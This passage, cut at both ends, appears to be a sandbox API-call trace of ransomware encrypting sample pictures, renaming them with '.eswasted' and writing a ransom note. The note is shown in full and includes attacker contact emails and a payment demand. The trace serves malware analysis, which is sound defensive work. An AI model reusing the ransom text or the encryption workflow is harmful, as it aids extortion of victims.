dwLen=0x1b8, pbBuffer=0x4ea2b0 | out: pbBuffer=0x4ea2b0) returned 1 [0084.937] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0084.937] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0084.938] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0084.938] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0084.953] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea470 [0084.953] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea268 | out: hHeap=0x4a0000) returned 1 [0084.953] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ebff0 [0084.953] _snwprintf (in: _Dest=0x4ebff0, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]N3LW7IoxV5lwRq76H7yP9pd5WnFzT++hKcs4fYzHLXwxDnP0wCdJZCjJFSq1wpj6\r\nGnY3n/Q2S/Eqg3VRxp9mZiy8dT+8+BRk9fLXE0ctbRpif5u47ypTnuPNew5QbWHG\r\n86zSuV97N8nW3XXZ4J9e/XGflmLzMrmBqLDrXt7lm/REvnnFnuGzGaVEfnWyUOcP\r\n2+mrUeHetXwNL5u+tZcRuL2EmIuRO3QN4zFGppjd0ChHKmZPEHlMVslWG4LfzFKj\r\nSOpQTKxUzNaZwAGl0E64iV+KBhqPRgvBtBgiWFs+xIvqiHmSAET8T0CjGFOMoxx4\r\nOfYECWGcdGLTdRMpbmbAIakGz680IMh0I8X3ugRIKYKTPqHIVe7d758B5zqELnFV\r\nRe9qN8WuqzZeAXn/9yZg7RsVbDGXLq1kPwJ1pmO45CDqSz/rRk9bAeUHpp+KXA0d\r\nlhz7lCrtgjN5H8y6Dof5H0HRCy4oFR/sML3065TO7oDyx34eTiUZLBJgvyE6s0nO\r\n6b66AjTU3LXjZsGvYAPk/X9IgkV9pAwZdLeMA3Cg/k1ulvO/byd3teAsIk8UNmeV\r\nLnpwQt1wJeUvO4mLn3s4XmxKzZUqQQcHQ5pGuszg5HoTB7WWo0kphSf4sP5pUtQQ\r\nzI2BbehwjkMgTMhraOfVGo1wRXb5hsNkcpg6SNog2aE=[end_key]\r\nKEEP IT\r\n") returned 990 [0084.953] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea470 | out: hHeap=0x4a0000) returned 1 [0084.953] WriteFile (in: hFile=0x118, lpBuffer=0x4ebff0*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4ebff0*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0084.953] SetEndOfFile (hFile=0x118) returned 1 [0084.955] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0084.955] CloseHandle (hObject=0x118) returned 1 [0084.955] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0084.955] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f3028 | out: hHeap=0x4a0000) returned 1 [0084.956] _aulldvrm () returned 0x0 [0084.956] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0084.956] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0084.956] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0084.956] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg") returned 55 [0084.956] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x278) returned 0x4e9fd8 [0084.956] lstrcpyW (in: lpString1=0x4ea046, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0084.957] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ea258 [0084.957] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0084.957] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ea258 | out: pbBuffer=0x4ea258) returned 1 [0084.957] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0084.957] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.eswasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0084.958] WriteFile (in: hFile=0x118, lpBuffer=0x4ea258*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ea258*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0084.959] SetEndOfFile (hFile=0x118) returned 1 [0084.959] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0084.959] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea258 | out: hHeap=0x4a0000) returned 1 [0084.959] lstrcpyW (in: lpString1=0x4ea046, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0084.959] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.eswasted")) returned 1 [0084.960] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Desert.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desert.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0084.960] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0084.960] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xce875 [0084.960] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xce875) returned 0x1220000 [0084.960] CloseHandle (hObject=0x120) returned 1 [0085.136] UnmapViewOfFile (lpBaseAddress=0x1220000) returned 1 [0085.151] CloseHandle (hObject=0x110) returned 1 [0085.151] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ea258 [0085.151] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0085.152] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ea2a0 | out: pbBuffer=0x4ea2a0) returned 1 [0085.152] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.153] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0085.153] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0085.153] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.163] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea460 [0085.163] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea258 | out: hHeap=0x4a0000) returned 1 [0085.163] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ebff0 [0085.163] _snwprintf (in: _Dest=0x4ebff0, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]dxYJ+4hArUab9kVvtH7D6HtBQ3izwIXLi8KBdTZF88QdsrY1Prr6Jy+F1zM/0ufo\r\nq7/SAjZvRlz8r+3W0MD8zFZfFZwc69ooYzIcNnGAzaj91iEma5vI7yxwyGsiKw4p\r\naOVl+9hqP4EA9eVjfnqkiVNMEwUBKh5HnYITy716lnR27mJtyDPDvqOH6M4F1AFw\r\ncWm16/RjCkbYP3dD38VQONyqEs1iNMqDsmtaev8zmJKjVmBMks46oebbOtH71oA5\r\nfJPjUG1aE7AjzMuUOrisw1UjI+1pFiSM3tcD2tqE6uyQmNkUEduAR6K5lJIN5Nz/\r\nbQSXdkpb/B5f+LXqYVmWEyizlF0LvH1MjIIRrnUFtngSGYYvacMIp1LzD0jIS0EI\r\ngQQo3fou4aPhK9BFIKbKE+O2M5887si4lqD8g6SVB5/zEamK7AyLXY6gUSzg1DBs\r\nfEwHFSz0VPGv2NtbMSxp6l6ANmGwcqRN9pcu0qOGUO4X9BJFDGk42yLa1JsZ6VwN\r\nSfHxEVdnvPbOyAnvw197KShNECKgicmCiVLnV2mXGIrCtjrAuyW+kHZb2JdXAFgO\r\nMSzz32bswbr8ZBMagq3SvxG3WNUT99zYlv4Rb5UNdmTaHpdBOEP8oDNanOrS0Mv2\r\nEBG0a6qM1MYuwBArn/spnnnNpJSPTcZMmlTqT7djyEp=[end_key]\r\nKEEP IT\r\n") returned 990 [0085.163] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea460 | out: hHeap=0x4a0000) returned 1 [0085.163] WriteFile (in: hFile=0x118, lpBuffer=0x4ebff0*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4ebff0*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0085.163] SetEndOfFile (hFile=0x118) returned 1 [0085.165] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0085.166] CloseHandle (hObject=0x118) returned 1 [0085.166] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0085.166] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dfc00 | out: hHeap=0x4a0000) returned 1 [0085.166] _aulldvrm () returned 0x0 [0085.166] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0085.167] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0085.167] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.167] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 59 [0085.167] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x280) returned 0x4e9fd8 [0085.167] lstrcpyW (in: lpString1=0x4ea04e, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0085.167] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ea260 [0085.167] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0085.168] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ea260 | out: pbBuffer=0x4ea260) returned 1 [0085.168] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.168] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.eswasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0085.168] WriteFile (in: hFile=0x118, lpBuffer=0x4ea260*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ea260*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0085.169] SetEndOfFile (hFile=0x118) returned 1 [0085.170] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.170] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea260 | out: hHeap=0x4a0000) returned 1 [0085.170] lstrcpyW (in: lpString1=0x4ea04e, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0085.170] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.eswasted")) returned 1 [0085.171] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0085.171] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x120 [0085.171] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x91554 [0085.171] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x91554) returned 0x1220000 [0085.172] CloseHandle (hObject=0x110) returned 1 [0085.226] UnmapViewOfFile (lpBaseAddress=0x1220000) returned 1 [0085.232] CloseHandle (hObject=0x120) returned 1 [0085.232] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4ea260 [0085.232] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0085.233] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4ea2a8 | out: pbBuffer=0x4ea2a8) returned 1 [0085.233] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.233] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0085.233] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0085.233] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.243] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea468 [0085.243] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea260 | out: hHeap=0x4a0000) returned 1 [0085.243] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ebff0 [0085.243] _snwprintf (in: _Dest=0x4ebff0, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]TeW2swAaPk18hmcerZKMiymo0X4o3a4FQPnY63MitIzt0Fl/MRghEKEPCXwi0u/p\r\nnGGKaTsADy//GM132Q8L5/su+qA4tDVtGrde7W257w+kC8T3B33p6+hzEO9LZekk\r\nLuH2+b7Z2c6O/BE0FXeIqilT3W6820BN9GkT5KMXZDQT7yVzRBem4Z7lnwoqPBTU\r\ntA17PhiaAe6Dl6A0UG79sl/bDIVSd2AbHISuVN9Q2/dIRGzLdLmj3kjVkitbD1m+\r\nPkJODiBgZrgzsSH8e/vCEjFpDB94X9gYFAZb7IU/hf1JKACNykCZ0Bl1pB0MFF7a\r\nctsxA9cwfWnbcf87PiZzoBkQwnEbqiztQKH9dHTKErRgav6VkciZNE8ZF1PYiLyD\r\nps4XeoYJf+RdINyDEAvU3+EldsFtvMR6ionrUqILxvAh+XtT5zhB0DICU4eBmGKM\r\nbbaxlEXuqMJFYpHE0ms76aXf75SJvcfXU/wK/gXKNhEqENDvPZ2fASVnb0y2eFsm\r\nNjunjxpKZe6drpohADLsThVZaWXhNVQPDGu6zXjS32XPcN+9yL1MJXLRfV8p4jNI\r\nbQrk1V5iyC8zvK1cYRJ215HdN3cEI+zZ/U+52IIPsmo8jeVqe9ui4mX0RBwxkYxd\r\nO7GsT69D+gBzhENl9WRYv8wmuk3Uuu72P++jyNMqgDk=[end_key]\r\nKEEP IT\r\n") returned 990 [0085.243] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea468 | out: hHeap=0x4a0000) returned 1 [0085.243] WriteFile (in: hFile=0x118, lpBuffer=0x4ebff0*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4ebff0*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0085.244] SetEndOfFile (hFile=0x118) returned 1 [0085.246] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ebff0 | out: hHeap=0x4a0000) returned 1 [0085.246] CloseHandle (hObject=0x118) returned 1 [0085.246] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0085.246] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f4de8 | out: hHeap=0x4a0000) returned 1 [0085.246] _aulldvrm () returned 0x0 [0085.246] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0085.247] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0085.247] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.247] lstrlenW (lpString="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg") returned 54 [0085.247] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x276) returned 0x4e9fd8 [0085.247] lstrcpyW (in: lpString1=0x4ea044, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0085.247] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ea258 [0085.247] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0085.248] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4ea258 | out: pbBuffer=0x4ea258) returned 1 [0085.248] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.248] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.eswasted_info" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0085.248] WriteFile (in: hFile=0x118, lpBuffer=0x4ea258*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4ea258*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0085.249] SetEndOfFile (hFile=0x118) returned 1 [0085.250] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0085.250] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ea258 | out: hHeap=0x4a0000) returned 1 [0085.250] lstrcpyW (in: lpString1=0x4ea044, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0085.250] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg"), lpNewFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.eswasted")) returned 1 [0085.252] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Koala.jpg.eswasted" (normalized: "c:\\users\\public\\pictures\\sample pictures\\koala.jpg.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0085.252] CreateFileMappingW (hFile=0x120, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0085.252] GetFileSize (in: hFile=0x120, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xbea1f [0085.252] MapViewOfFile (hFileMappingObject=0xfc, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xbea1f) returned 0x1380000 [0085.252] CloseHandle (hObject=0x120) returned 1 [0085.337] UnmapViewOfFile (lpBaseAddress=0x1380000) returned 1 [0085.375] CloseHandle (hObject=0xfc) returned 1 [0085.375] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d91a8 [0085.375] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0085.376] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0085.376] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.376] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0085.377] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0085.377] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0085.385] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ea258 [0085.385] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0085.385] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4ebff0 [0085.385] _snwprintf (in: _Dest=0x4ebff0, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING 